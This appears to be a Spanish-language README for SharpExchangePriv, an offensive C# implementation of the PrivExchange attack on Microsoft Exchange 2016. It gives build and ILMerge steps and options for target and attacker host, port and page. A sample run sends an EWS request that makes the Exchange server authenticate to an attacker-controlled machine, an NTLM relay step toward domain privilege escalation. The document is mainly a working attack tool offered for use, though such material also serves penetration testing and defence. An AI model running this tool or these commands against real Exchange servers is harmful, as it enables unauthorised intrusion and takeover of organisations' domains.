
Una implementación en C# de PrivExchange por @_dirkjan.
Una implementación en C# de PrivExchange por @_dirkjan. Gracias a @g0ldenGunSec, ya que me basé en su código.
Se probó contra Exchange 2016.
SharpExchangePriv se ha compilado con .NET 3.5 y es compatible con Visual Studio 2017. Simplemente abra el archivo de solución y compile el proyecto.
Usé CommandLineParser para analizar los argumentos. Esto creará el archivo CommandLine.dll, junto con el ejecutable. Puede fusionar fácilmente el .exe y el .dll en un solo archivo ejecutable:
ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll
--targetHostEstablezca la IP del host de destino.
--attackerHostEstablezca la IP del atacante
--attackerPortEstablezca el puerto del atacante
--attackerPageEstablezca la página del atacante
--sslHabilitar SSL
--exchangeVersionEstablezca la versión de Exchange, el valor predeterminado es 2016
--exchangePortEstablezca el puerto de destino de Exchange
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
/$$$$$$$ /$$ /$$$$$$$$ /$$
| $$__ $$ |__/ | $$_____/ | $$
| $$ \ $$ /$$$$$$ /$$ /$$ /$$| $$ /$$ /$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$
| $$$$$$$//$$__ $$| $$| $$ /$$/| $$$$$ | $$ /$$/ /$$_____/| $$__ $$ |____ $$| $$__ $$ /$$__ $$ /$$__ $$
| $$____ /| $$ \__ /| $$ \ $$/$$/ | $$__ / \ $$$$/ | $$ | $$ \ $$ /$$$$$$$| $$ \ $$| $$ \ $$| $$$$$$$$
| $$ | $$ | $$ \ $$$/ | $$ >$$ $$ | $$ | $$ | $$ /$$__ $$| $$ | $$| $$ | $$| $$_____ /
| $$ | $$ | $$ \ $/ | $$$$$$$$ /$$/\ $$| $$$$$$$| $$ | $$| $$$$$$$| $$ | $$| $$$$$$$| $$$$$$$
|__/ |__/ |__/ \_/ |________/|__/ \__/ \_______/|__/ |__/ \_______/|__/ |__/ \____ $$ \_______/
/$$ \ $$
| $$$$$$/
\______ /
@den_n1s
The target URL is https://192.168.11.10:443/EWS/Exchange.asmx
Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx
HTTP 200 response received, the target Exchange server should be authenticating shortly.
Por favor, reporte cualquier error en la página del proyecto de Github o contácteme en twitter @den_n1s